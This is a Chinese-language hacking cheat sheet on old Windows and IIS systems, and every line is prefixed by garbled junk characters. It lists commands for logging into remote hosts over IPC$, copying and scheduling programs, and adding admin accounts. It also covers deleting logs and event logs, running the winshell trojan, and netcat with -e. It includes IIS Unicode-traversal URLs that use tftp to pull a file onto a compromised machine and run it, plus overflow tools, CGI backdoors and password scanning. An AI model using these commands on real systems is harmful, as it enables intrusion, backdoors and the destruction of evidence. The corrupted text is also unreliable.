网管和黑客都必须知道的命令
=�[_=�y=�G 常用的几条NET命令:
WR�:�I�2-1 �/&>vhp�Z} (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
p)���&Yr�� hiT&QJB` _ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
f3;.�+hJ]) Pl/}`H:�R& (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
] �Hiw+�5n V�'�i�T>�� (查看远程主机时间) net time \\IP地址
h85�k�Q^%� /�^M|$J�RI (定时启动某个程序) at \\IP地址 02:18 readme.exe
r,�8~qHbOT d��,XNok�{ (查看共享) net view \\IP地址
�^.g���BHZ �,v@C=4�'m (查看netbios工作组列表) nbtstat -A IP地址
/:�Ge�XDJw (8In�f_�59 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
\2#j1/d�4� 96#aG�h��> (这两条把自己增加到管理员组): net user 用户名 密码 /add
JIOeD�uw+� JqTR4[`�Z\ net localgroup Administrators 用户名 /add
^| r�6��>b @3v[L<S��{ (断开连接) net use \\IP地址\ipc$ /delete
w l#jSj%pd /6@$^�pa�B 扫尾:
Ox�%.�We�5 ;!�:@�3c�� del C:\winnt\system32\logfiles\*.*
2�t��}�^�8 ~{0�0moN"m del C:\winnt\ssytem32\config\*.evt
qA��>�C<NL 6|10�OTVu` del C:\winnt\system32\dtclog\*.*
(yO�8�G-Z0 L�Xq��0hI� del C:\winnt\system32\*.log
+�U�a.\1"6 M
$\!�SXL del C:\winnt\system32\*.txt
f�7��v|N�) �E�oh{+>:6 del C:\winnt\*.txt
3�R��?6{.� �*wl&Zz�x del C:\winnt\*.log
Xt�ftG7r9S �bFB.hkTP 一、netsvc.exe
I~T~!^}��U �i~ITRi@�� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
]&_z@Z.i� ��2*�pNI�c netsvc /list \\IP地址
/#�Lm)-�%G ?�656P�=b) netsvc schedule \\IP地址 /query
"�}�^}3"/. f5P��@PG]{ netsvc \\IP地址 schedule /start
�/L;
�c -^ u!TM�t�8+c 二、OpenTelnet.exe
xz*MFoE��� �\qw1�\�-q 远程启动主机的Telnet服务,并绑定端口到7878,例如:
owe6�ge7m
��v<:/u�(i OpenTelnet \\IP地址 用户名 密码 1 7878
vC%Hc/�&.} %mN�d9 ]< 然后就可以telnet到主机的7878端口,进入DOS方式下:
It8s#�o�q8 W/G7��5o~6 telnet IP地址 7878
k~=W��1�R% ��#�� 5b
� 三、winshell.exe
0�}wm��BSl �3)�3�$ �L 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
:$^cY��>o� ij&T��\):d p Path (查看winshell主程序的路径信息)
tE]Y=x[Ux� Z ItS(o�J. b reBoot (重新启动机器)
d_�)VeuE2� I9�hZ&ed16 d shutDown (关闭机器)
@%�gt�h@�8 �~!#2s���' s Shell (执行后你就会看到可爱的“C:\>”)
8?G534*r@2 T3I�n�0LQ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
p�e>[Ts`2F <�4R�P:�2# CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
w3�K>IDWI7 >{�.|N�g4K 四、3389登陆器,GUI方式登录远程主机的
a=AP*adx8� gbT1d���:T 五、elsave.exe
E=RX^� 3+} �PGJkQsp0� 事件日志清除工具
��?h�3t"�9 *� %w8bB� elsave -s \\IP地址 -l "application" -C
8=WX`*�-uH x2D�g9��2 elsave -s \\IP地址 -l "system" -C
�ld�RisL� ��[f�#7~� elsave -s \\IP地址 -l "security" -C
U�U����DZ�
��:\I�Z-� 执行后成功清除应用程序日志,系统日志,安全日志
��p�(pL�"� df�7���xpV 六、hbulot.exe
�Y%#r&�de f�B`7f�
$[ 开启win2kserver和winxp的3389服务
+a�74] H�" (T1d!v"�~" hbulot [/r]
gbjql+Mx+� (laVm�U?I7 使用/r表示安装完成后自动重起目标使设置生效。
�
y aL�c~K �#�GIjU�1- 七、nc.exe(netcat.exe)
��CNrK]+>� ;��)��'�� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
7"�s8��G�7 vl:V�?-sY 想要连接到某处: nc [-options] hostname port[s] [ports] ...
B��iD}�C�� �OG�{vap�) 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
f/�t�J>^N5 dobq�Yd�4` 参数:
�����DH'0# eWU@��@$�9 -e prog 程序重定向,一旦连接,就执行 [危险!!]
�ZGC*BP/� <S(`e�/�#[ -g gateway source-routing hop point[s], up to 8
S|/Za".�Gr Ct0Yw��IR* -G num source-routing pointer: 4, 8, 12, ...
"���>!<�OB F9�2�et<y. -h 帮助信息
z-`-�0@/A$ \4"01:�u'� -i secs 延时的间隔
r>;6�>�ZMe �k��C=h[<' -l 监听模式,用于入站连接
CINC1Ll_24 �=SpD6
9-H -n 指定数字的IP地址,不能用hostname
�%�G/�j+Pf 2; ~j�KR[~ -o file 记录16进制的传输
�3�F�E=�?Q �v�8No�D_� -p port 本地端口号
�������7�) �uJu#Vr:�m -r 任意指定本地及远程端口
#/2W RN1L� l_�0�/g^(� -s addr 本地源地址
0mY��KzJi� z3��(:a�'� -u UDP模式
}4wIfI83K, >%Nqg�n$�V -v 详细输出——用两个-v可得到更详细的内容
�~�-K<�gT/ Nc[[o�>/Cb -w secs timeout的时间
&N\4�/�'wV o�V=~��Q#v -z 将输入输出关掉——用于扫描时
�Lk:S��j�u 八、TFTPD32.EXE
oC >l|?�h, m�Yw��9lM� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
Z�!��S�FJ{ U7le>� d;L http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�*$E�cP`K$ �^:64(7�� 然后可以直接令文件运行:
" UxKG+� � $hE�,BeQ�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
.C?r�ToCY '?j,oRz^�T 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
J'4V_Kjg�- =b[q�<p\�� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
{3R?<ET]mt z57|�9$h}w 一、一 Xscan命令行运行参数说明:
_{�f7�e�^; �#�Ss� lH 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
{�((|IvP`� sH�`(y�)`_ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
/FW{>N1��� } D���0�Y8 xscan -file <主机列表文件名> <检测项目> [其他选项]
�6$_/��/ -]e@F��N�L 其中<检测项目> 含义如下:
2�j(�]B�t: �Q]"u�?�Q] -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
"��j] r��� KQv97�#n1� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
:rhh=nHgn H<w�r�usRg -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
1KWGQJ%�%s �K�i�{]5Rz -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
6p1�)�wf.J
MT�UJsH\� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�>p�,F�Az> b am*&E%0K [其他选项] 含义如下:
�jZLD^@A�P ^�DWh�IxBh -v: 显示详细扫描进度
B`1"4[�{� "E/�UNE6P4 -p: 跳过Ping不通的主机
�@� �- _lw �];V��J�54 -o: 跳过没有检测到开放端口的主机
cJ#�|mzup� �e~iPN.�'1 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
